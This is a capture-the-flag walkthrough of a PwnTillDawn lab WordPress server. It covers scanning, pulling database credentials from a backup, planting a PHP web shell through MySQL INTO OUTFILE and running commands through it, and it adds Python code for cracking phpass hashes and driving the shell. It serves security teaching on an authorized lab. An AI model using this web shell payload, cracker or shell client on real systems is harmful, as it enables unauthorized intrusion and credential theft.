As always, we start with an nmap scan.
E:\PENTEST\NMAP>nmap -A 10.150.150.145
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 11:06 W. Europe Standard Time
Nmap scan report for 10.150.150.145
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
|   2048 65:cc:32:50:bb:af:b4:8a:be:ff:b1:39:3c:dd:2c:e9 (RSA)
|   256 f9:db:6f:49:63:d7:db:dd:42:42:86:36:c5:31:b1:07 (ECDSA)
|_  256 8e:74:a9:e3:fd:74:0c:c2:f7:14:85:81:a6:ba:fc:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.12
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: e-corp – Just another WordPress site
3306/tcp open  mysql   MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.1.26-MariaDB-0+deb9u1
|   Thread ID: 33
|   Capabilities flags: 63487
|   Some Capabilities: ODBCClient, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, LongPassword, Speaks41ProtocolOld, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: (TQy0!PQ&h[pA3{54D92
|_  Auth Plugin Name: 103
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.26
OS details: Linux 2.4.26 (Slackware 10.0.0)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   ...
2   31.00 ms 10.150.150.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.36 seconds

E:\PENTEST\NMAP>
Then we brute-force the web root with dirb for files with the .zip extension. Note that -w in dirb means "don't stop on warning messages", not "wordlist"; the scan still ran with /usr/share/dirb/wordlists/common.txt because that is dirb's default wordlist, which the output confirms.
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $dirb http://10.150.150.145 -X .zip -w /usr/share/dirb/wordlists/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Feb  5 12:06:25 2021
URL_BASE: http://10.150.150.145/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.zip) | (.zip) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.150.150.145/ ----
+ http://10.150.150.145/backup.zip (CODE:200|SIZE:10187627)

-----------------
END_TIME: Fri Feb  5 12:09:38 2021
DOWNLOADED: 4612 - FOUND: 1

┌─[user@parrot-virtual]─[~/ptd]
We find http://10.150.150.145/backup.zip, a backup of the WordPress install.
FLAG14 is in here = e804bb2ca0c3d89ae027de4d86246130d9e3252c
The wp-config.php inside this zip contains the database credentials:
/** MySQL database username */
define('DB_USER', 'wpmaster');
/** MySQL database password */
define('DB_PASSWORD', '-!UlTr4S3cUr3P455W0rd-!');
The nmap scan showed 3306/tcp (MySQL) open on 10.150.150.145, so we connect to it with DBeaver using the wpmaster credentials.
Among the tables we find FLAG32_a40987757b60acc87e80196c757f2a19c8acc3b5.
The WordPress users table also gives the password hash for the user eadmin: $P$B2auwafsSB05anAeWeHLNnAlk2hZLg1
We try hashcat on it (mode 400 is the phpass / WordPress portable hash format):
E:\PENTEST\hashcat>hashcat64.exe -O -m 400 -a 0 -o cracked.txt target_hashes.txt rockyou.txt --force
hashcat (v5.1.0) starting...
Nothing in rockyou.txt matches, so the password is not in that wordlist.
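As an added example (not code from the original write-up), the following Python recomputes the WordPress/phpass portable hash that hashcat mode 400 targets. It lets you check a single candidate against the eadmin hash without hashcat, generate hashes of your own to sanity-check the implementation, and try a short custom list when a dictionary run finds nothing. The candidate list is constructed; EADMIN_HASH is the hash from the database dump above.

```python
# Added example, not part of the original write-up: pure-Python phpass
# ($P$...) portable hashing as used by WordPress 4.x (hashcat mode 400).
import hashlib
import os
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash of the user eadmin from the write-up's database dump.
EADMIN_HASH = "$P$B2auwafsSB05anAeWeHLNnAlk2hZLg1"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant: different alphabet from RFC 4648, no padding."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Recompute a $P$ hash from its 12-char setting: '$P$', one char giving
    log2(rounds), then an 8-char salt. The stored hash is its own setting."""
    if setting[:3] != "$P$":
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad iteration count")
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("bad salt")
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):          # 'B' -> 2**13 = 8192 rounds
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, count_log2: int = 13) -> str:
    """Generate a fresh hash with a random salt, as WordPress' wp_hash_password() does."""
    salt = _encode64(os.urandom(6), 6)        # 6 random bytes -> 8 salt chars
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_check(password: str, stored: str) -> bool:
    """Verify a candidate against a stored $P$ hash."""
    return phpass_crypt(password, stored) == stored


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first matching candidate, or None (what the rockyou run produced)."""
    for candidate in candidates:
        if phpass_check(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist; all of these are in rockyou, so None is expected.
    print(crack(EADMIN_HASH, ["password", "123456", "wpmaster", "eadmin"]))
```

Once a plaintext for eAdmin turns up elsewhere on the box, `phpass_check(that_password, EADMIN_HASH)` is a one-line way to confirm it is the same credential that the database stores.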
Since the wpmaster account can write files through MySQL, we drop a PHP web shell into the web root with INTO OUTFILE:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"
This only works because three things line up: the database user holds the FILE privilege, secure_file_priv on the server does not restrict where mysqld may write, and /var/www/html is writable by the mysql user. The resulting cmd.php is unauthenticated, so anyone who finds it gets command execution as the web server user; remove it when the engagement is over.
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=ls
WordPress-Account.txt
backup.zip
c.php
cmd.php
conf
hallo.txt
hoi.txt
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20WordPress-Account.txt
user: eAdmin password: 9r*WNyK7GUJ($bwi8G

E:\PENTEST>
We log in to the WordPress site as eadmin with that password and find FLAG23 in a draft post:
FLAG23=8ea0d06e16bccc89922bf674d7a90297a5316fda (Draft)
Next we search the web root for flag files through the web shell:
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20.%20-iname%20%22FLAG*%22
./wp-content/uploads/FLAG22.txt
The file is served directly from http://10.150.150.145/wp-content/uploads/, which gives FLAG22 = 723d1a71be3d744bf84d9683c8df84f0fd916977
The same search over the whole filesystem (the /sys and /proc hits are kernel files that happen to be named flags, not CTF flags):
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20/%20-iname%20%22FLAG*%22
/home/webmaster/FLAG6.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/var/www/html/wp-content/uploads/FLAG22.txt
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags

E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20/home/webmaster/FLAG6.txt%20/
6340427478524495dd30102486948aa7e01ae4d1
E:\PENTEST>
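Added example, not code from the original write-up: a small Python client for the cmd.php shell that percent-encodes whole commands (hand-encoding only spaces and quotes, as in the curl calls above, breaks as soon as a command contains `&`, `|`, `;` or `#`), builds a tighter find invocation, and filters find output so the /sys and /proc `flags` pseudo-files do not pollute the results. SHELL_URL is the lab host from this write-up; the sample find output is constructed from the lines shown above.

```python
# Added example, not part of the original write-up: helper client for the
# INTO OUTFILE web shell and a filter for noisy "find / -iname FLAG*" output.
import re
from typing import List
from urllib.parse import quote
from urllib.request import urlopen

# Lab host from the write-up; cmd.php is the shell written via INTO OUTFILE.
SHELL_URL = "http://10.150.150.145/cmd.php"

# Pseudo-filesystems full of files literally named "flags" that -iname "FLAG*" matches.
NOISE_PREFIXES = ("/sys/", "/proc/")


def shell_url(cmd: str, base: str = SHELL_URL) -> str:
    """Build the GET URL with every reserved byte percent-encoded, so '&', '|',
    ';', '#' and quotes reach the shell intact instead of being eaten by curl
    or split into extra query parameters."""
    return f"{base}?cmd={quote(cmd, safe='')}"


def find_cmd(root: str = "/") -> str:
    """A tighter search than the bare find used above: regular files only,
    skip /proc and /sys, and silence permission errors on stderr."""
    return (f'find {root} -type f -iname "FLAG*" '
            '-not -path "/proc/*" -not -path "/sys/*" 2>/dev/null')


def run(cmd: str, base: str = SHELL_URL, timeout: float = 10.0) -> str:
    """Execute cmd through the web shell and return its stdout (live network call)."""
    with urlopen(shell_url(cmd, base), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def flag_files(find_output: str) -> List[str]:
    """Keep only paths whose basename looks like FLAG<number>..., dropping the
    /sys and /proc 'flags' entries that a wildcard search drags in."""
    hits: List[str] = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path or path.startswith(NOISE_PREFIXES):
            continue
        if re.match(r"FLAG\d", path.rsplit("/", 1)[-1], re.IGNORECASE):
            hits.append(path)
    return hits


# Constructed from the find output shown in the write-up, one path per line.
SAMPLE_FIND_OUTPUT = """\
/home/webmaster/FLAG6.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/virtual/net/lo/flags
/var/www/html/wp-content/uploads/FLAG22.txt
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
"""

if __name__ == "__main__":
    print(shell_url(find_cmd()))
    print(flag_files(SAMPLE_FIND_OUTPUT))
    # Against the lab host: print(flag_files(run(find_cmd())))
```

`run()` is the only function that touches the network; everything else can be exercised offline, which is also where the encoding bug shows up: an unencoded `&&` in the query string is silently split into a second parameter and the second command never runs.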
For reference, this is how the web shell was written into the web root:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
Author : Puckiestyle